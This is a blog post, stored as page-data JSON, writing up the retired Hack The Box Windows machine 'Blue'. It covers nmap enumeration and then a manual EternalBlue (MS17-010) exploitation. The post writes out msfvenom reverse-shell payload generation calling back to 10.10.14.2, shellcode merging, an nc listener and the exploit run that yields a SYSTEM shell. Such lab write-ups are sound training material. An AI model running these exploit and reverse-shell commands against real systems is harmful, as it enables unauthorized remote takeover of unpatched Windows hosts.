{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-blue-2-en","result":{"data":{"markdownRemark":{"id":"f9335855-cfdc-5b2b-be2b-8429a98a8cf9","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-windows-blue-2\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<img src=\"/static/59a44f345c68fecc58b1c0114e6f0024/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\">\n<p>This time I am writing up the retired HackTheBox machine “Blue”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg 
aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#exploit\">Exploit</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" 
width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>I started with a quick scan as usual.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.40  $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\nPORT      STATE SERVICE      VERSION\n<span class=\"token number\">135</span>/tcp   <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">139</span>/tcp   <span class=\"token function\">open</span>  netbios-ssn  Microsoft Windows netbios-ssn\n<span class=\"token number\">445</span>/tcp   <span class=\"token function\">open</span>  microsoft-ds Windows <span class=\"token number\">7</span> Professional <span class=\"token number\">7601</span> Service Pack <span class=\"token number\">1</span> microsoft-ds <span class=\"token punctuation\">(</span>workgroup: WORKGROUP<span class=\"token punctuation\">)</span>\n<span class=\"token number\">49152</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">49153</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">49154</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token 
number\">49155</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">49156</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">49157</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\nHost script results:\n<span class=\"token operator\">|</span> smb-security-mode: \n<span class=\"token operator\">|</span>   account_used: guest\n<span class=\"token operator\">|</span>   authentication_level: user\n<span class=\"token operator\">|</span>   challenge_response: supported\n<span class=\"token operator\">|</span>_  message_signing: disabled <span class=\"token punctuation\">(</span>dangerous, but default<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> smb2-time: \n<span class=\"token operator\">|</span>   date: <span class=\"token number\">2022</span>-07-27T11:37:27\n<span class=\"token operator\">|</span>_  start_date: <span class=\"token number\">2022</span>-07-27T11:34:22\n<span class=\"token operator\">|</span> smb2-security-mode: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2.1</span>: \n<span class=\"token operator\">|</span>_    Message signing enabled but not required\n<span class=\"token operator\">|</span> smb-os-discovery: \n<span class=\"token operator\">|</span>   OS: Windows <span class=\"token number\">7</span> Professional <span class=\"token number\">7601</span> Service Pack <span class=\"token number\">1</span> <span class=\"token punctuation\">(</span>Windows <span class=\"token number\">7</span> Professional <span class=\"token number\">6.1</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional\n<span class=\"token operator\">|</span>   Computer name: haris-PC\n<span class=\"token operator\">|</span>   NetBIOS computer name: 
HARIS-PC<span class=\"token punctuation\">\\</span>x00\n<span class=\"token operator\">|</span>   Workgroup: WORKGROUP<span class=\"token punctuation\">\\</span>x00\n<span class=\"token operator\">|</span>_  System time: <span class=\"token number\">2022</span>-07-27T12:37:26+01:00\n<span class=\"token operator\">|</span>_clock-skew: mean: -19m57s, deviation: 34m36s, median: 1s</code></pre></div>\n<p>Several ports related to Windows Remote Procedure Call were open.</p>\n<p>Since the platform is <code class=\"language-text\">Windows 7 Professional 7601 Service Pack 1</code> with an SMB port open, EternalBlue seemed like a viable attack.</p>\n<h2 id=\"exploit\" style=\"position:relative;\"><a href=\"#exploit\" aria-label=\"exploit permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Exploit</h2>\n<p>I ran <code class=\"language-text\">checker.py</code> from <a href=\"https://github.com/worawit/MS17-010\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">GitHub - worawit/MS17-010: MS17-010</a>, but none of the pipe names were accessible.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ python eternalchecker.py <span class=\"token number\">10.10</span>.10.40\nTarget OS: Windows <span class=\"token number\">7</span> Professional <span class=\"token number\">7601</span> Service Pack <span class=\"token number\">1</span>\nThe target is not patched\n\n<span class=\"token operator\">==</span><span class=\"token 
operator\">=</span> Testing named pipes <span class=\"token operator\">==</span><span class=\"token operator\">=</span>\nspoolss: STATUS_ACCESS_DENIED\nsamr: STATUS_ACCESS_DENIED\nnetlogon: STATUS_ACCESS_DENIED\nlsarpc: STATUS_ACCESS_DENIED\nbrowser: STATUS_ACCESS_DENIED</code></pre></div>\n<p>I also ran <code class=\"language-text\">eternalblue_exploit7.py</code> from the same repository with a payload I created, but could not get a shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ msfvenom -p windows/shell_reverse_tcp <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token number\">10.10</span>.14.2 <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">4444</span> <span class=\"token operator\">></span> shellcode\n$ python exploit.py <span class=\"token number\">10.10</span>.10.40 shellcode \nshellcode size: <span class=\"token number\">324</span>\nnumGroomConn: <span class=\"token number\">13</span>\nTarget OS: Windows <span class=\"token number\">7</span> Professional <span class=\"token number\">7601</span> Service Pack <span class=\"token number\">1</span>\nSMB1 session setup allocate nonpaged pool success\nSMB1 session setup allocate nonpaged pool success\ngood response status: INVALID_PARAMETER\n<span class=\"token keyword\">done</span></code></pre></div>\n<p>Since no pipe name was found, I looked for other exploits.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ searchsploit eternal\n----------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                           <span class=\"token operator\">|</span>  
Path\n----------------------------------------------------------------------------------------- ---------------------------------\nEternal Lines Web Server <span class=\"token number\">1.0</span> - Remote Denial of Service                                  <span class=\"token operator\">|</span> multiple/dos/25075.pl\nEternalMart Guestbook <span class=\"token number\">1.10</span> - <span class=\"token string\">'/admin/auth.php'</span> Remote File Inclusion                     <span class=\"token operator\">|</span> php/webapps/2980.txt\nEternalMart Mailing List Manager <span class=\"token number\">1.32</span> - Remote File Inclusion                            <span class=\"token operator\">|</span> php/webapps/23218.txt\nMicrosoft Windows - <span class=\"token string\">'EternalRomance'</span>/<span class=\"token string\">'EternalSynergy'</span>/<span class=\"token string\">'EternalChampion'</span> SMB Remote Code  <span class=\"token operator\">|</span> windows/remote/43970.rb\nMicrosoft Windows <span class=\"token number\">7</span>/2008 R2 - <span class=\"token string\">'EternalBlue'</span> SMB Remote Code Execution <span class=\"token punctuation\">(</span>MS17-010<span class=\"token punctuation\">)</span>         <span class=\"token operator\">|</span> windows/remote/42031.py\nMicrosoft Windows <span class=\"token number\">7</span>/8.1/2008 R2/2012 R2/2016 R2 - <span class=\"token string\">'EternalBlue'</span> SMB Remote Code Executio <span class=\"token operator\">|</span> windows/remote/42315.py\nMicrosoft Windows <span class=\"token number\">8</span>/8.1/2012 R2 <span class=\"token punctuation\">(</span>x64<span class=\"token punctuation\">)</span> - <span class=\"token string\">'EternalBlue'</span> SMB Remote Code Execution <span class=\"token punctuation\">(</span>MS17-01 <span class=\"token operator\">|</span> windows_x86-64/remote/42030.py\n----------------------------------------------------------------------------------------- 
---------------------------------\nShellcodes: No Results</code></pre></div>\n<p>So I switched to using <code class=\"language-text\">MS17-010/eternalblue_exploit7.py</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">git</span> clone https://github.com/worawit/MS17-010\n\nnasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin\nmsfvenom -p windows/x64/shell_reverse_tcp <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">443</span> <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token number\">10.10</span>.14.2 --platform windows -a x64 --format raw -o sc_x64_payload.bin\n<span class=\"token function\">cat</span> sc_x64_kernel.bin sc_x64_payload.bin <span class=\"token operator\">></span> sc_x64.bin\n\nnasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin\nmsfvenom -p windows/shell_reverse_tcp <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">443</span> <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token number\">10.10</span>.14.2 --platform windows -a x86 --format raw -o sc_x86_payload.bin\n<span class=\"token function\">cat</span> sc_x86_kernel.bin sc_x86_payload.bin <span class=\"token operator\">></span> sc_x86.bin\n\npython2.7 MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin\n\n<span class=\"token function\">ifconfig</span> tun0 mtu <span class=\"token number\">1400</span>\n<span class=\"token function\">sudo</span> <span class=\"token function\">nc</span> -nlvp <span class=\"token number\">443</span>\npython MS17-010/eternalblue_exploit7.py <span class=\"token number\">10.10</span>.10.40 
sc_all.bin</code></pre></div>\n<p>I followed the steps below for the actual exploit procedure.</p>\n<p>For some reason, setting the payload port to 4444 did not work, but changing it to 443 succeeded (why?).</p>\n<p>Reference: <a href=\"https://root4loot.com/post/eternalblue_manual_exploit/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS17-010 EternalBlue Manual Exploitation | root4loot</a></p>\n<p><img src=\"/static/4099e7d66145ce9f51c6ac942f55acb6/3d4b6/image-20220728204938531.png\" alt=\"image-20220728204938531\" title=\"image-20220728204938531\"></p>\n<p>Got a SYSTEM shell and finished.</p>","fields":{"slug":"/hackthebox-windows-blue-2-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-07-27","description":"A writeup of the retired HackTheBox machine 'Blue'.","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Blue (Easy/Windows)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-windows-blue-2-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}